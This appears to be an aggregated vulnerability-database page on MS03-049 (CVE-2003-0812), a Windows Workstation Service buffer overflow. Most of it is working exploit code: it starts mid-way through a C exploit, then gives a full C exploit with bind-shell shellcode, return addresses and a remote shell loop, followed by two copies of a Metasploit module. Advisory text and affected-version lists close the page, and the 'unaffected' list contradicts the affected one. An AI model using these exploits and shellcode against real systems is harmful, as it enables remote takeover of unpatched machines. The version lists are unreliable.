		err_exit("-> socket() error...");
	}
	sockadd.sin_family=AF_INET;
	sockadd.sin_port=htons((SHORT)port);

	ptr=buff+retsize+sc_offset;

	if (BSIZE<(retsize+sc_offset+scsize)) err_exit("-> Bad 'sc_offset'..");

	banner();

	if (mode) {

		printf("-> 'Listening' mode...( port: %d )\n",port);

		changeport(connback, port, PORT_OFFSET_2);
		for(i=0;i<scsize;i++) { *ptr++=connback[i]; }

		do_send(host,timeout);
		Sleep(1000);

		sockadd.sin_addr.s_addr=htonl(INADDR_ANY);
		i_len=sizeof(sockadd);

		if (bind(s1,(struct sockaddr *)&sockadd,i_len)<0) {
			err_exit("-> bind() error");
		}

		if (listen(s1,0)<0) {
			err_exit("-> listen() error");
		}

		printf("-> Waiting for connection...\n");

		s2=accept(s1,(struct sockaddr *)&sockadd,&i_len);

		if (s2<0) {
			err_exit("-> accept() error");
		}

		printf("-> Connection from: %s\n\n",inet_ntoa(sockadd.sin_addr));

		resetalarm();
		doshell(s2);

	}
	else {

		printf("-> 'Connecting' mode...\n",port);

		changeport(bindport, port, PORT_OFFSET_1);
		for(i=0;i<scsize;i++) { *ptr++=bindport[i]; }

		do_send(host,timeout);
		Sleep(1000);

		printf("-> Will try connecting to shell now....\n");

		i=0;  
		while(!flag) {
			Sleep(interval*1000);
			if(connect(s1,(struct sockaddr *)&sockadd, sizeof(sockadd))<0) {
				printf("-> Trial #%d....\n",i++);
			}
			else { flag=1; }
		}

		printf("-> Connected to shell at %s:%d\n\n",inet_ntoa(sockadd.sin_addr),port);

		resetalarm();
		doshell(s1);

	}

	return 0;

}

// milw0rm.com [2003-11-14]
		

- 漏洞信息 (130)

MS Windows XP Workstation Service Remote Exploit (MS03-049) (EDBID:130)
windows remote
2003-12-04 Verified
0 fiNis
N/A [点击下载]
/* To build new netapi32.lib
		pedump /exp netapi32.dll > netapi32.exp
		buildlib netapi32.exe netapi32.exp netapi32.lib netapi32.dll


d:\>rpc_wks_bo.exe

WKS service remote exploit MS03-049 by fiNis (fiNis[at]bk[dot]ru), ver:0.1.1
-------------------------------------------------------------------
Usage: rpc_wks_bo.exe [-ht]
	-h <IP>    : Target IP
	-t <Type>  : Target type (-t0 for a list)

d:\>rpc_wks_bo.exe -t0

Possible targets are:
============================
1) Window XP Pro + SP0 [Rus]
2) Window XP Pro + SP1 [Rus]
3) Crash all

d:\>rpc_wks_bo.exe -h 192.168.100.7 -t1

[+] Prepare exploit string
[+] Sleep at 2s ...
[+] Setting up IPC$ session...
[+] IPC$ session setup successfully!
[+] Sending exploit ...
[+] Initialize WSAStartup - OK
[+] Socket initialized - OK
[+] Try connecting to 192.168.100.7:9191 ...
[*] Connected to shell at 192.168.100.7:9191

Microsoft Windows XP [Âåðñèÿ 5.1.2600]
(Ñ) Êîðïîðàöèÿ Ìàéêðîñîôò, 1985-2001.

C:\WINDOWS\system32>

*/
/**************** Public version *****************/
#include <stdio.h>
#include <io.h>
#include <stdlib.h>
#include <string.h>
#include <winsock2.h>
#include <windows.h>
#include <process.h>

#pragma lib <ws2_32.lib>
#pragma lib <netapi32.lib>
#pragma lib <mpr.lib>

#define RECVTIMEOUT		1
#define VER				"0.1.4"

extern char getopt(int,char **,char*);
extern char *optarg;


// ------------------------------------------------
void NetAddAlternateComputerName(wchar_t *Server, wchar_t *AlternateName, wchar_t * DomainAccount,
				wchar_t *DomainAccountPassword, unsigned int Reserved);
void send_exp();
// ----------Lamers buff =) ----------------------------
	char expl[3000];
	wchar_t expl_uni[6000];
	char tgt_net[30];
	wchar_t tgt_net_uni[60];
	char ipc[30];
// -----------------------------------------------------
struct {
	char *os;
	long jmpesp;
}
targets[] = {
	{ "Window XP + SP0 [Rus]            ", 0x77f5801c }, // 0x77d6754a(user32.dll)
	{ "Window XP + SP0 + Rollup [Rus]   ", 0x77f98db7 },  //0x77d639ab-work 0x77fb59cc - sp1
	{ "Window XP + SP1 [Rus]            ", 0x77fb59cc },
	{ "Window XP + SP1 + Rollup [Rus]   ", 0x77f9980f },  // 0x77d637db(user32.dll)
	{ "Crash all                ", 0x41424344 }
}, tgt_type;

unsigned char shellcode[] = // bind shell at 9191 port (484 bytes) // ripped =)
	"\xEB\x03\x5D\xEB\x05\xE8\xF8\xFF\xFF\xFF\x8B\xC5\x83\xC0\x11\x33"
	"\xC9\x66\xB9\xC9\x01\x80\x30\x88\x40\xE2\xFA\xDD\x03\x64\x03\x7C"
	"\x09\x64\x08\x88\x88\x88\x60\xC4\x89\x88\x88\x01\xCE\x74\x77\xFE"
	"\x74\xE0\x06\xC6\x86\x64\x60\xD9\x89\x88\x88\x01\xCE\x4E\xE0\xBB"
	"\xBA\x88\x88\xE0\xFF\xFB\xBA\xD7\xDC\x77\xDE\x4E\x01\xCE\x70\x77"
	"\xFE\x74\xE0\x25\x51\x8D\x46\x60\xB8\x89\x88\x88\x01\xCE\x5A\x77"
	"\xFE\x74\xE0\xFA\x76\x3B\x9E\x60\xA8\x89\x88\x88\x01\xCE\x46\x77"
	"\xFE\x74\xE0\x67\x46\x68\xE8\x60\x98\x89\x88\x88\x01\xCE\x42\x77"
	"\xFE\x70\xE0\x43\x65\x74\xB3\x60\x88\x89\x88\x88\x01\xCE\x7C\x77"
	"\xFE\x70\xE0\x51\x81\x7D\x25\x60\x78\x88\x88\x88\x01\xCE\x78\x77"
	"\xFE\x70\xE0\x2C\x92\xF8\x4F\x60\x68\x88\x88\x88\x01\xCE\x64\x77"
	"\xFE\x70\xE0\x2C\x25\xA6\x61\x60\x58\x88\x88\x88\x01\xCE\x60\x77"
	"\xFE\x70\xE0\x6D\xC1\x0E\xC1\x60\x48\x88\x88\x88\x01\xCE\x6A\x77"
	"\xFE\x70\xE0\x6F\xF1\x4E\xF1\x60\x38\x88\x88\x88\x01\xCE\x5E\xBB"
	"\x77\x09\x64\x7C\x89\x88\x88\xDC\xE0\x89\x89\x88\x88\x77\xDE\x7C"
	"\xD8\xD8\xD8\xD8\xC8\xD8\xC8\xD8\x77\xDE\x78\x03\x50\xDF\xDF\xE0"
	"\x8A\x88\xAB\x6F\x03\x44\xE2\x9E\xD9\xDB\x77\xDE\x64\xDF\xDB\x77"
	"\xDE\x60\xBB\x77\xDF\xD9\xDB\x77\xDE\x6A\x03\x58\x01\xCE\x36\xE0"
	"\xEB\xE5\xEC\x88\x01\xEE\x4A\x0B\x4C\x24\x05\xB4\xAC\xBB\x48\xBB"
	"\x41\x08\x49\x9D\x23\x6A\x75\x4E\xCC\xAC\x98\xCC\x76\xCC\xAC\xB5"
	"\x01\xDC\xAC\xC0\x01\xDC\xAC\xC4\x01\xDC\xAC\xD8\x05\xCC\xAC\x98"
	"\xDC\xD8\xD9\xD9\xD9\xC9\xD9\xC1\xD9\xD9\x77\xFE\x4A\xD9\x77\xDE"
	"\x46\x03\x44\xE2\x77\x77\xB9\x77\xDE\x5A\x03\x40\x77\xFE\x36\x77"
	"\xDE\x5E\x63\x16\x77\xDE\x9C\xDE\xEC\x29\xB8\x88\x88\x88\x03\xC8"
	"\x84\x03\xF8\x94\x25\x03\xC8\x80\xD6\x4A\x8C\x88\xDB\xDD\xDE\xDF"
	"\x03\xE4\xAC\x90\x03\xCD\xB4\x03\xDC\x8D\xF0\x8B\x5D\x03\xC2\x90"
	"\x03\xD2\xA8\x8B\x55\x6B\xBA\xC1\x03\xBC\x03\x8B\x7D\xBB\x77\x74"
	"\xBB\x48\x24\xB2\x4C\xFC\x8F\x49\x47\x85\x8B\x70\x63\x7A\xB3\xF4"
	"\xAC\x9C\xFD\x69\x03\xD2\xAC\x8B\x55\xEE\x03\x84\xC3\x03\xD2\x94"
	"\x8B\x55\x03\x8C\x03\x8B\x4D\x63\x8A\xBB\x48\x03\x5D\xD7\xD6\xD5"
	"\xD3\x4A\x8C\x88";


/***************************************************************/
void banner() {
	printf("\nWKS service remote exploit by fiNis (fiNis[at]bk[dot]ru), ver:%s\n",VER);
	printf(  "-------------------------------------------------------------------\n");
}

void showtargets() {
	int i;
	printf("Possible targets are:\n");
	printf("============================\n");
	for (i=0;i<sizeof(targets)/sizeof(tgt_type);i++) {
		printf("%d) %s\n",i+1,targets[i].os);
	}
	exit(1);
}

void usage(char *prog) {
	banner();
	printf("Usage: %s [-ht]\n", prog);
	printf("\t-h <IP>    : Target IP\n");
	printf("\t-t <Type>  : Target type (-t0 for a list)\n");
	exit(1);
}

/***************************************************************/
long gimmeip(char *hostname)
{
	struct hostent *he;
	long ipaddr;

	if ((ipaddr = inet_addr(hostname)) < 0)
	{
		if ((he = gethostbyname(hostname)) == NULL)
		{
			printf("[x] Failed to resolve host: %s! Exiting...\n\n",hostname);
			WSACleanup();
			exit(1);
		}
		memcpy(&ipaddr, he->h_addr, he->h_length);
	}
	return ipaddr;
}

// ************************************* CMD *****************************
/*
 * Ripped from TESO code and modifed by ey4s for win32
 */

void cmdshell2(int sock) {
	int l;
	char buf[1000];
	struct timeval time;
	unsigned long ul[2];

	time.tv_sec=RECVTIMEOUT;
	time.tv_usec=0;

	while (1) {
		ul[0]=1;
		ul[1]=sock;

		l=select(0,(fd_set *)&ul,NULL,NULL,&time);
		if(l==1) {
			l=recv(sock,buf,sizeof(buf),0);
			if (l<=0) {
				printf("[x] Connection closed.\n");
				return;
			}
			l=write(1,buf,l);
			if (l<=0) {
				printf("[x] Connection closed.\n");
				return;
			}
		}
		else {
			l=read(0,buf,sizeof(buf));
			if (l<=0) {
				printf("[x] Connection closed.\n");
				return;
			}
			l=send(sock,buf,l,0);
			if (l<=0) {
				printf("[x] Connection closed.\n");
				return;
			}
		}
	}
}

/****************************************************************/
void send_exp() {
	NETRESOURCE _IPC_;

	_IPC_.lpLocalName = NULL;
	_IPC_.lpProvider = NULL;
	_IPC_.dwType = RESOURCETYPE_ANY;
	_IPC_.lpRemoteName = (char*)&ipc;
	printf("[+] Setting up IPC$ session...\n");
	if (WNetAddConnection2(&_IPC_,"","",0)!=ERROR_SUCCESS) {
		printf("[x] Couldn't establish IPC$ connection.\n");
		exit (1);
	}
	printf("[*] IPC$ session setup successfully!\n");
	printf("[+] Sending exploit ...\n");

	NetAddAlternateComputerName(tgt_net_uni, expl_uni ,NULL,NULL,0);
	// ka-a-a b0-0-0-ms //
}

// ***************************************************************
int main(int argc,char *argv[])
{
	WSADATA wsdata;
	int sock;
	unsigned short port = 9191;
	struct sockaddr_in target;
	unsigned long ip;
	char opt;
	int tgt_type = 0;
	char *tgt_host;

	if (argc<2) { usage(argv[0]); }

	while((opt = getopt(argc,argv,"h:t:v"))!=EOF) {
		switch(opt)
		{
			case 'h':
				tgt_host = optarg;
				snprintf(tgt_net,127, "\\\\%s", optarg);
				snprintf(ipc,127, "\\\\%s\\ipc$", optarg);
				break;
			case 't':
				tgt_type = atoi(optarg);
				if (tgt_type == 0 || tgt_type > sizeof(targets) / 8) {
					showtargets();
				}
				break;
			default:
				usage(argv[0]);
				break;
		}
	}

	printf("\n[+] Prepare exploit string\n");

	memset(expl, 0x00, sizeof(expl));
	memset(expl, 0x41, 2064);
	memcpy(&expl[2044], (unsigned char *) &targets[tgt_type-1].jmpesp, 4);
	//memcpy(&expl[2044], "BBBB", 4);
	memcpy(&expl[2064], shellcode, sizeof(shellcode));		// begin shellcode here

	memset(expl_uni, 0x00, sizeof(expl_uni));
	memset(tgt_net_uni, 0x00, sizeof(tgt_net_uni));
	mbstowcs(tgt_net_uni, tgt_net, sizeof(tgt_net));

	switch(tgt_type) {
		case 1:
		case 3:
	MultiByteToWideChar(CP_ACP, 0, expl, sizeof(expl), (unsigned short *)expl_uni,sizeof(expl_uni));
	// MultiByteToWideChar - 100 % work at XP+SP0+Rollup
	break;
		case 2:
			mbstowcs(expl_uni, expl, sizeof(expl)); // work at XP+SP1
			break;
		default:
			mbstowcs(expl_uni, expl, sizeof(expl));
			break;
	}

	beginthread(send_exp,0,NULL);

	printf("[+] Sleep at 2s ... \n");
	sleep(2000);

	if (WSAStartup(MAKEWORD(2,0),&wsdata)!=0) {
		printf("[x] WSAStartup error...\n");
		WSACleanup();
        return 1;
	}
	printf("[+] Initialize WSAStartup - OK\n");

	if ((sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))<0) {

		printf("[x] Socket not initialized! Exiting...\n");
		WSACleanup();
        return 1;
	}
	printf("[*] Socket initialized - OK\n");

	ip=gimmeip(tgt_host);
	memset(&target, 0, sizeof(target));
	target.sin_family=AF_INET;
	target.sin_addr.s_addr = ip;
	target.sin_port=htons(port);

	printf("[+] Try connecting to %s:%d ...\n",tgt_host,port);

	if(connect(sock,(struct sockaddr *)&target, sizeof(target))!=0) {
			printf("\n[x] Exploit failed or is Filtred. Exiting...\n");
			WSACleanup();
			exit(1);
	}

	printf("[*] Connected to shell at %s:%d\n\n",inet_ntoa(target.sin_addr),port);
	cmdshell2(sock);
	closesocket(sock);
	WSACleanup();
	return 0;
}



// milw0rm.com [2003-12-04]
		

- 漏洞信息 (16378)

Microsoft Workstation Service NetAddAlternateComputerName Overflow (EDBID:16378)
windows remote
2010-05-09 Verified
0 metasploit
N/A [点击下载]
##
# $Id: ms03_049_netapi.rb 9262 2010-05-09 17:45:00Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = GoodRanking

	include Msf::Exploit::Remote::DCERPC
	include Msf::Exploit::Remote::SMB

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Microsoft Workstation Service NetAddAlternateComputerName Overflow',
			'Description'    => %q{
					This module exploits a stack buffer overflow in the NetApi32 NetAddAlternateComputerName
				function using the Workstation service in Windows XP.
			},
			'Author'         => [ 'hdm' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: 9262 $',
			'References'     =>
				[
					[ 'CVE', '2003-0812' ],
					[ 'OSVDB', '11461' ],
					[ 'BID', '9011' ],
					[ 'MSB', 'MS03-049' ],
				],
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'thread',
				},
			'Privileged'     => true,
			'Payload'        =>
				{
					'Space'    => 1000,
					'BadChars' =>  "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c" + [*(0x80..0x9f)].pack('C*'),
					'StackAdjustment' => -3500,
				},
			'Platform'       => 'win',
			'DefaultTarget'  => 0,
			'Targets'        =>
				[
					[ 'Windows XP SP0/SP1',
						{
							'Ret' => 0x71aa32ad # pop/pop/ret in ws2help.dll
						}
					],
				],
			'DisclosureDate' => 'Nov 11 2003'))

		register_options(
			[
				OptString.new('SMBPIPE', [ true,  "The pipe name to use (BROWSER, WKSSVC)", 'BROWSER']),
			], self.class)
	end

	def exploit

		connect()
		smb_login()

		handle = dcerpc_handle(
			'6bffd098-a112-3610-9833-46c3f87e345a', '1.0',
			'ncacn_np', ["\\#{datastore['SMBPIPE']}"]
		)

		print_status("Binding to #{handle} ...")
		dcerpc_bind(handle)
		print_status("Bound to #{handle} ...")

		print_status("Building the stub data...")


		name = rand_text_alphanumeric(5000)
		name[3496, 4] = [target.ret].pack('V')
		name[3492, 2] = "\xeb\x06"
		name[3500, 5] = "\xe9" + [-3505].pack('V')
		name[0, payload.encoded.length] = payload.encoded

		stub =
			NDR.long(rand(0xffffffff)) +
			NDR.UnicodeConformantVaryingString("\\\\#{datastore['RHOST']}") +
			NDR.long(rand(0xffffffff)) +
			NDR.UnicodeConformantVaryingString(name) +
			NDR.long(rand(0xffffffff)) +
			NDR.UnicodeConformantVaryingString('') +
			NDR.long(0) +
			NDR.long(0)

		print_status("Calling the vulnerable function...")

		begin
			dcerpc.call(0x1b, stub)
		rescue Rex::Proto::DCERPC::Exceptions::NoResponse
		rescue => e
			if e.to_s !~ /STATUS_PIPE_DISCONNECTED/
				raise e
			end
		end

		# Cleanup
		handler
		disconnect
	end

end
		

- 漏洞信息 (F83213)

Microsoft Workstation Service NetAddAlternateComputerName Overflow (PacketStormID:F83213)
2009-11-26 00:00:00
H D Moore  metasploit.com
exploit,overflow
windows,xp
CVE-2003-0812
[点击下载]

This Metasploit module exploits a stack overflow in the NetApi32 NetAddAlternateComputerName function using the Workstation service in Windows XP.

##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to 
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote

	include Msf::Exploit::Remote::DCERPC
	include Msf::Exploit::Remote::SMB


	def initialize(info = {})
		super(update_info(info,	
			'Name'           => 'Microsoft Workstation Service NetAddAlternateComputerName Overflow',
			'Description'    => %q{
        		This module exploits a stack overflow in the NetApi32 NetAddAlternateComputerName
				function using the Workstation service in Windows XP.
			},
			'Author'         => 
				[
					'hdm'
				],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision$',
			'References'     =>
				[
					[ 'CVE', '2003-0812' ],
					[ 'OSVDB', '11461' ],
					[ 'BID', '9011' ],
					[ 'MSB', 'MS03-049' ],
				],
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'thread',
				},
			'Privileged'     => true,
			'Payload'        =>
				{			
					'Space'    => 1000,
					'BadChars' =>  "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c" + [*(0x80..0x9f)].pack('C*'),
					'StackAdjustment' => -3500,
				},
			'Platform'       => 'win',
			'DefaultTarget'  => 0,
			'Targets'        => 
				[
					[ 'Windows XP SP0/SP1', 
						{
							'Ret' => 0x71aa32ad # pop/pop/ret in ws2help.dll
						} 
					],
				],

			'DisclosureDate' => 'Nov 11 2003'))

		register_options(
			[
				OptString.new('SMBPIPE', [ true,  "The pipe name to use (BROWSER, WKSSVC)", 'BROWSER']),
			], self.class)
						
	end

	def exploit	

		connect()
		smb_login()

		handle = dcerpc_handle(
			'6bffd098-a112-3610-9833-46c3f87e345a', '1.0', 
			'ncacn_np', ["\\#{datastore['SMBPIPE']}"]
		)
		
		print_status("Binding to #{handle} ...")
		dcerpc_bind(handle)
		print_status("Bound to #{handle} ...")

		print_status("Building the stub data...")	
		
		
		name = rand_text_alphanumeric(5000)
		name[3496, 4] = [target.ret].pack('V')
		name[3492, 2] = "\xeb\x06"
		name[3500, 5] = "\xe9" + [-3505].pack('V')
		name[0, payload.encoded.length] = payload.encoded

		stub = 
			NDR.long(rand(0xffffffff)) +
			NDR.UnicodeConformantVaryingString("\\\\#{datastore['RHOST']}") +
			NDR.long(rand(0xffffffff)) +
			NDR.UnicodeConformantVaryingString(name) +
			NDR.long(rand(0xffffffff)) +
			NDR.UnicodeConformantVaryingString('') +
			NDR.long(0) +
			NDR.long(0)
			
		print_status("Calling the vulnerable function...")
		
		begin
			dcerpc.call(0x1b, stub)
		rescue Rex::Proto::DCERPC::Exceptions::NoResponse
		rescue => e
			if e.to_s !~ /STATUS_PIPE_DISCONNECTED/
				raise e
			end
		end

		# Cleanup
		handler
		disconnect
	end

end
    

- 漏洞信息

11461
Microsoft Windows Workstation Service WKSSVC.DLL Logging Function Remote Overflow
Remote / Network Access Input Manipulation
Loss of Integrity
Exploit Public, Exploit Commercial Vendor Verified

- 漏洞描述

A remote overflow exists in the Windows Workstation Service of Microsoft Windows. The 'WKSSVC.DLL' fails to perform proper bounds checking resulting in a buffer overflow. With a specially crafted request, a remote attacker can cause arbitrary code execution with SYSTEM privileges resulting in a loss of integrity.

- 时间线

2003-11-11 2003-09-15
2003-11-11 2003-11-11

- 解决方案

Currently, there are no known workarounds or upgrades to correct this issue. However, Microsoft has released a patch to address this vulnerability.

- 相关参考

- 漏洞作者

- 漏洞信息

Microsoft Windows Workstation Service Remote Buffer Overflow Vulnerability
Boundary Condition Error 9011
Yes No
2003-11-11 12:00:00 2009-07-12 12:56:00
Vulnerability discovery credited to eEye Digital Security. Core Security Technologies has been credited with providing the updated information about the new attack vector of sending a single UDP packet to a broadcast address to exploit all vulnerable syst

- 受影响的程序版本

Microsoft Windows XP Professional SP1
Microsoft Windows XP Professional
Microsoft Windows XP Media Center Edition
Microsoft Windows XP Home SP1
Microsoft Windows XP Home
Microsoft Windows XP 64-bit Edition SP1
Microsoft Windows XP 64-bit Edition
Microsoft Windows 2000 Server SP4
Microsoft Windows 2000 Server SP3
Microsoft Windows 2000 Server SP2
Microsoft Windows 2000 Server SP1
Microsoft Windows 2000 Server
+ Avaya DefinityOne Media Servers
+ Avaya IP600 Media Servers
+ Avaya S3400 Message Application Server 0
+ Avaya S8100 Media Servers 0
Microsoft Windows 2000 Professional SP4
Microsoft Windows 2000 Professional SP3
Microsoft Windows 2000 Professional SP2
Microsoft Windows 2000 Professional SP1
Microsoft Windows 2000 Professional
Microsoft Windows 2000 Datacenter Server SP4
Microsoft Windows 2000 Datacenter Server SP3
Microsoft Windows 2000 Datacenter Server SP2
Microsoft Windows 2000 Datacenter Server SP1
Microsoft Windows 2000 Datacenter Server
Microsoft Windows 2000 Advanced Server SP4
Microsoft Windows 2000 Advanced Server SP3
Microsoft Windows 2000 Advanced Server SP2
Microsoft Windows 2000 Advanced Server SP1
Microsoft Windows 2000 Advanced Server
Cisco Voice Manager
Cisco User Registration Tool
Cisco uOne Enterprise Edition
Cisco Unity Server 4.0
Cisco Unity Server 3.3
Cisco Unity Server 3.2
Cisco Unity Server 3.1
Cisco Unity Server 3.0
Cisco Unity Server 2.46
Cisco Unity Server 2.4
Cisco Unity Server 2.3
Cisco Unity Server 2.2
Cisco Unity Server 2.1
Cisco Unity Server 2.0
Cisco Unity Server
Cisco Transport Manager
Cisco Trailhead
Cisco SN 5428 Storage Router SN5428-3.3.2-K9
Cisco SN 5428 Storage Router SN5428-3.3.1-K9
Cisco SN 5428 Storage Router SN5428-3.2.2-K9
Cisco SN 5428 Storage Router SN5428-3.2.1-K9
Cisco SN 5428 Storage Router SN5428-2.5.1-K9
Cisco SN 5428 Storage Router SN5428-2-3.3.2-K9
Cisco SN 5428 Storage Router SN5428-2-3.3.1-K9
Cisco SN 5420 Storage Router 1.1.3
Cisco SN 5420 Storage Router 1.1 (7)
Cisco SN 5420 Storage Router 1.1 (5)
Cisco SN 5420 Storage Router 1.1 (4)
Cisco SN 5420 Storage Router 1.1 (3)
Cisco SN 5420 Storage Router 1.1 (2)
Cisco Small Network Management Solution
Cisco Service Management
Cisco Secure Scanner
Cisco Secure Policy Manager 3.0.1
Cisco Secure Access Control Server 3.2.2
Cisco Secure Access Control Server 3.2.1
Cisco Secure Access Control Server 3.2 (1.20)
Cisco Secure Access Control Server
Cisco Routed Wan Management
Cisco QoS Policy Manager
Cisco Personal Assistant 1.4 (2)
Cisco Personal Assistant 1.4 (1)
Cisco Personal Assistant 1.3 (4)
Cisco Personal Assistant 1.3 (3)
Cisco Personal Assistant 1.3 (2)
Cisco Personal Assistant 1.3 (1)
Cisco Personal Assistant
Cisco Networking Services for Active Directory
Cisco Network Registar
Cisco Media Blender
Cisco Lan Management Solution
Cisco IP/VC 3540 Video Rate Matching Module
Cisco IP/VC 3540 Application Server
Cisco IP/TV Server
Cisco IP Telephony Environment Monitor
Cisco IP Call Center Express (IPCC Express) Standard 3.0
Cisco IP Call Center Express (IPCC Express) Enhanced 3.0
Cisco Internet Service Node
Cisco Intelligent Contact Manager 5.0
Cisco Intelligent Contact Manager
Cisco E-Mail Manager
Cisco Dynamic Content Adapter
Cisco DOCSIS CPE Configurator
Cisco Customer Response Application Server
Cisco Conference Connection 1.2
Cisco Conference Connection 1.1 (1)
Cisco Conference Connection
Cisco Collaboration Server
Cisco CiscoWorks VPN/Security Management Solution
Cisco Call Manager 4.0
Cisco Call Manager 3.3 (3)
Cisco Call Manager 3.3
Cisco Call Manager 3.2
+ Cisco VoIP Phone 7902G 0
+ Cisco VoIP Phone 7905G 0
+ Cisco VoIP Phone 7912G 0
Cisco Call Manager 3.1 (3a)
Cisco Call Manager 3.1 (2)
Cisco Call Manager 3.1
Cisco Call Manager 3.0
Cisco Call Manager 2.0
Cisco Call Manager 1.0
Cisco Call Manager
Cisco Building BroadBand Service Manager Hotspot 1.0
Cisco Building Broadband Service Manager (BBSM) 5.1
Cisco Building Broadband Service Manager (BBSM) 5.0
Cisco Building Broadband Service Manager (BBSM) 4.5
Cisco Building Broadband Service Manager (BBSM) 4.4
Cisco Building Broadband Service Manager (BBSM) 4.3
Cisco Building Broadband Service Manager (BBSM) 4.2
Cisco Building Broadband Service Manager (BBSM) 4.0.1
Cisco Building Broadband Service Manager (BBSM) 3.0
Cisco Building Broadband Service Manager (BBSM) 2.5.1
Cisco Broadband Troubleshooter
Microsoft Windows XP 64-bit Edition Version 2003
Microsoft Windows Server 2003 Web Edition
Microsoft Windows Server 2003 Standard Edition
Microsoft Windows Server 2003 Enterprise Edition Itanium 0
Microsoft Windows Server 2003 Enterprise Edition
Microsoft Windows Server 2003 Datacenter Edition Itanium 0
Microsoft Windows Server 2003 Datacenter Edition
Microsoft Windows NT Workstation 4.0 SP6a
Microsoft Windows NT Workstation 4.0 SP6
Microsoft Windows NT Workstation 4.0 SP5
Microsoft Windows NT Workstation 4.0 SP4
Microsoft Windows NT Workstation 4.0 SP3
Microsoft Windows NT Workstation 4.0 SP2
Microsoft Windows NT Workstation 4.0 SP1
Microsoft Windows NT Workstation 4.0
Microsoft Windows NT Terminal Server 4.0 SP6
Microsoft Windows NT Terminal Server 4.0 SP5
Microsoft Windows NT Terminal Server 4.0 SP4
Microsoft Windows NT Terminal Server 4.0 SP3
Microsoft Windows NT Terminal Server 4.0 SP2
Microsoft Windows NT Terminal Server 4.0 SP1
Microsoft Windows NT Terminal Server 4.0
Microsoft Windows NT Server 4.0 SP6a
+ Avaya DefinityOne Media Servers
+ Avaya DefinityOne Media Servers
+ Avaya IP600 Media Servers
+ Avaya IP600 Media Servers
+ Avaya S3400 Message Application Server 0
+ Avaya S8100 Media Servers 0
+ Avaya S8100 Media Servers 0
Microsoft Windows NT Server 4.0 SP6
Microsoft Windows NT Server 4.0 SP5
Microsoft Windows NT Server 4.0 SP4
Microsoft Windows NT Server 4.0 SP3
Microsoft Windows NT Server 4.0 SP2
Microsoft Windows NT Server 4.0 SP1
Microsoft Windows NT Server 4.0
Microsoft Windows NT Enterprise Server 4.0 SP6a
Microsoft Windows NT Enterprise Server 4.0 SP6
Microsoft Windows NT Enterprise Server 4.0 SP5
Microsoft Windows NT Enterprise Server 4.0 SP4
Microsoft Windows NT Enterprise Server 4.0 SP3
Microsoft Windows NT Enterprise Server 4.0 SP2
Microsoft Windows NT Enterprise Server 4.0 SP1
Microsoft Windows NT Enterprise Server 4.0
Microsoft Windows ME

- 不受影响的程序版本

Microsoft Windows XP 64-bit Edition Version 2003
Microsoft Windows Server 2003 Web Edition
Microsoft Windows Server 2003 Standard Edition
Microsoft Windows Server 2003 Enterprise Edition Itanium 0
Microsoft Windows Server 2003 Enterprise Edition
Microsoft Windows Server 2003 Datacenter Edition Itanium 0
Microsoft Windows Server 2003 Datacenter Edition
Microsoft Windows NT Workstation 4.0 SP6a
Microsoft Windows NT Workstation 4.0 SP6
Microsoft Windows NT Workstation 4.0 SP5
Microsoft Windows NT Workstation 4.0 SP4
Microsoft Windows NT Workstation 4.0 SP3
Microsoft Windows NT Workstation 4.0 SP2
Microsoft Windows NT Workstation 4.0 SP1
Microsoft Windows NT Workstation 4.0
Microsoft Windows NT Terminal Server 4.0 SP6
Microsoft Windows NT Terminal Server 4.0 SP5
Microsoft Windows NT Terminal Server 4.0 SP4
Microsoft Windows NT Terminal Server 4.0 SP3
Microsoft Windows NT Terminal Server 4.0 SP2
Microsoft Windows NT Terminal Server 4.0 SP1
Microsoft Windows NT Terminal Server 4.0
Microsoft Windows NT Server 4.0 SP6a
+ Avaya DefinityOne Media Servers
+ Avaya DefinityOne Media Servers
+ Avaya IP600 Media Servers
+ Avaya IP600 Media Servers
+ Avaya S3400 Message Application Server 0
+ Avaya S8100 Media Servers 0
+ Avaya S8100 Media Servers 0
Microsoft Windows NT Server 4.0 SP6
Microsoft Windows NT Server 4.0 SP5
Microsoft Windows NT Server 4.0 SP4
Microsoft Windows NT Server 4.0 SP3
Microsoft Windows NT Server 4.0 SP2
Microsoft Windows NT Server 4.0 SP1
Microsoft Windows NT Server 4.0
Microsoft Windows NT Enterprise Server 4.0 SP6a
Microsoft Windows NT Enterprise Server 4.0 SP6
Microsoft Windows NT Enterprise Server 4.0 SP5
Microsoft Windows NT Enterprise Server 4.0 SP4
Microsoft Windows NT Enterprise Server 4.0 SP3
Microsoft Windows NT Enterprise Server 4.0 SP2
Microsoft Windows NT Enterprise Server 4.0 SP1
Microsoft Windows NT Enterprise Server 4.0
Microsoft Windows ME

- 漏洞讨论

It has been reported that Microsoft Windows Workstation (WKSSVC.DLL) service is prone to a vulnerability that may allow a remote attacker to gain unauthorized access to a vulnerable host. The problem is in the handling of requests by the Workstation Service. The Workstation Service does not properly check bounds on remote data therefore making it possible to overwrite sensitive regions of system memory.

- 漏洞利用

CORE has developed a working commercial exploit for their IMPACT product. This exploit is not otherwise publicly available or known to be circulating in the wild.

Various exploits have been published, some of which are designed to target systems using NTFS filesystems and other which only affect those using FAT. The primary difference is that the exploits designed for NTFS use an undocumented Windows XP API call to log to the debug directory, which would not normally be writeable by all users.

The following exploits are designed to affect systems using FAT filesystems only:
MS03-049ex.c
o_wks.c
11.14.MS03-049-II.c

The following exploits are designed to affect systems using NTFS and FAT:
12.04.rpc_wks_bo.c
0349.cpp

An exploit that is reported to be universal for all versions of Windows XP and will work on both NTFS and FAT file systems is available (WorkstationExploit.c):

- 解决方案

